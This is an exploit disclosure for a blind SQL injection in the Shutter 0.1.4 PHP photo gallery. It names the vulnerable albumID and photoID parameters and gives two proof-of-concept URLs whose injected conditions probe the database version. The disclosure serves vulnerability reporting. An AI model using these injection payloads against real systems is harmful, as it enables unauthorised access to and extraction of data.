Shutter version 0.1.4 suffers from a remote blind SQL injection vulnerability.
d4e30ff91683c82e5e49dc80891f2302d15b65436d2800c58cb775f2ba19b9ab
# Exploit Title: Shutter 0.1.4 Blind SQL Injection
# Date: March 18, 2010
# Author: Blake
# Software Link:
http://sourceforge.net/projects/shutter-php/files/shutter/v0.1.4/shutter_0.1.4.zip/download
# Version: version 0.1.4
The albumID and photoID parameters are vulnerable to SQL Injection.
POC:
http://192.168.1.149/shutter/admin.html?albumID=2%20and%20substring%28@@version,1,1%29=5
http://192.168.1.149/shutter/admin.html?albumID=2&photoID=5%20and%20substring%28@@version,1,1%29=5